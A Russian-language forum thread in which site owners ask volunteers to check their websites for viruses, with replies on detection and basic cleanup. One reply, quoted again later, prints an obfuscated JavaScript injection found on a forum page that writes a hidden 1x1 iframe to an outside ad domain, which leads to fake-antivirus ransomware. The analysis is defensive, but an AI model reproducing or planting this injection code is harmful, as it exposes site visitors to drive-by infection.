Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

  • Автор темы Автор темы akok
  • Дата начала Дата начала
Здравствуйте, Уважаемые!
Не могли бы вы проверить хттп://prizolov.ru/
У меня аваст на некоторые страницы ругается...
 
Surok, пока ничего подозрительного не вижу. Можно скриншет с алертом и ссылку по которой происходит срабатывание антивируса.
 
Здравствуйте!
Проверьте плиз и мой сайт на вирус там скорей всего либо фрейм, скрипт или JS.
Вот сайт design-studio.at.ua

Заранее спс
 
vicik_SH, необходимо больше информации. Сейчас я не вижу вредоносного кода.

Полезные сылки по вашему ресурсу.
1
2

Вечером попробую провести более глубокий анализ с тестовой машины.
 
А если я пришлю Вам по АСЕ или по мылу HTML шаблон чтоб Вы проверили его или нет в нём вредоносного скрипта или JS файла, ато хочу поменять Дизайн а тут такое.
P.S - Когда ставлю тот шаблон то слева шрифт нормальный а с правой стороны во всех блоках он чуток "жирный"
 
vicik_SH, хорошо.

akok<at>pisem.net с указанной ссылкой на тему. (at=@)

Добавлено через 2 часа 16 минут 47 секунд
vicik_SH, ответ отправил мылом.
 
Здравствуйте! проверьте пожалуйста на наличие вирусов ввв.fxstart-forum.org . Кажись там снова завелась зараза, которая редиректит на хттп://armadaneo.info/0/go.php?sid=2#post40889.
 
Последнее редактирование модератором:
LVM, мне не нравится архив.
хттп://fxstart-forum.org/archive/index.php
Там скрипт сидит
PHP:
function uDfWq(BLguro){ var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;");var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;"); fff=op.split("648"); } 
document['w192r141i175t159121e'.replace(/[0-9]/g,'')]('<div id=ATDOE style="visibility:hidden;display:none">%22%3Ciframe width%3D1 height%3D1 border%3D0 frameborder%3D0 src%3D%22http%3A%2F%2Freklamma.com%2Fnewspost%2Fin.php%22%3E%3C%2Fiframe%3E</div>');function ZiQGVsmqK(bVDxhu){  fff.op.replace("950"); fff=op.split("312"); } 
document['w146r196i113t188141e'.replace(/[0-9]/g,'')](unescape(document.getElementById('ATDOE').innerHTML));function SPnr(IpIxeMN){ var ZbRAlZGt = document.getElementById('aZCkvrZq');window.eval();window.eval(); } 
function kNVR(rMQ){ window.eval(); fff.op.replace("966");window.eval(); } 
function SBGfrfR(ngt){  fff=op.split("752"); fff.op.replace("498");var mKINvwDi = document.getElementById('MAprkE'); }


Который редиректит на
Код:
http://****mma.com/newspost/in.php
Где сидит редирект на
Код:
http://***.com/news/index.php
Где находится, нечто зашифрованное :)
И не допускается заходить по ссылке два раза... редиректит http://www.google.ru/

Добавлено через 1 минуту 38 секунд
По второй ссылке класический антивирус вымогатель (я так и не смог его запустить на тестовой машине).
 
LVM, мне не нравится архив.
хттп://fxstart-forum.org/archive/index.php
Там скрипт сидит
PHP:
function uDfWq(BLguro){ var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;");var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;"); fff=op.split("648"); } 
document['w192r141i175t159121e'.replace(/[0-9]/g,'')]('<div id=ATDOE style="visibility:hidden;display:none">%22%3Ciframe width%3D1 height%3D1 border%3D0 frameborder%3D0 src%3D%22http%3A%2F%2Freklamma.com%2Fnewspost%2Fin.php%22%3E%3C%2Fiframe%3E</div>');function ZiQGVsmqK(bVDxhu){  fff.op.replace("950"); fff=op.split("312"); } 
document['w146r196i113t188141e'.replace(/[0-9]/g,'')](unescape(document.getElementById('ATDOE').innerHTML));function SPnr(IpIxeMN){ var ZbRAlZGt = document.getElementById('aZCkvrZq');window.eval();window.eval(); } 
function kNVR(rMQ){ window.eval(); fff.op.replace("966");window.eval(); } 
function SBGfrfR(ngt){  fff=op.split("752"); fff.op.replace("498");var mKINvwDi = document.getElementById('MAprkE'); }


Который редиректит на
Код:
http://****mma.com/newspost/in.php
Где сидит редирект на
Код:
http://***.com/news/index.php
Где находится, нечто зашифрованное :)
И не допускается заходить по ссылке два раза... редиректит http://www.google.ru/

Добавлено через 1 минуту 38 секунд
По второй ссылке класический антивирус вымогатель (я так и не смог его запустить на тестовой машине).

Спасибо!!!
 
araan515, это специально веб мастер столько порно набросал?

Добавлено через 1 минуту 38 секунд
Прошу простить, но у меня нет желания разбирать сайт с подобным рекламным контентом.

Спасибо за понимание.
 
Добрый день! Помогите вылечить сайт ввв.mebellina.com
Аваст ругается на JS Downloader EX, на HTML:Illframe...
Что делать??? ЗАРАНЕЕ СПАСИБО
 
В настоящее время сайт Mebellina.com находится в разработке.


posokhoff, остается поиск вставки "лишнего" кода в страницу. Антивирус Avast?
 
posokhoff, остается поиск вставки "лишнего" кода в страницу. Антивирус Avast?
Пришлось пока сменить главную страницу на сообщение о работах на сайте... Антивирус Аваст стоит. Вообще как лечатся сайты от вирусов? Какой-нибудь софт есть? Скрипты?
 
Подходы стандартны.

Проверки html страницы на наличия "вкраплений"

Проверка файлов на FTP и сравнение с исходниками.

Ну а в начале обязательно сменить пароль на FTP (и больше не хранить его в файл менеджерах)

Добавлено через 48 секунд
Антивирус Аваст стоит.
Иногда ругается на рекламу.
 
Проверьте плиз сайт нттп smartall.ru KIS 9.0 ругается на Exploit.Win32.Pidief.cvy. Если реально есть то объясните как решить проблему ! буду благодарен !
 
smartall, сейчас есть проблемы? На первый взгляд чисто.
 
Назад
Сверху Снизу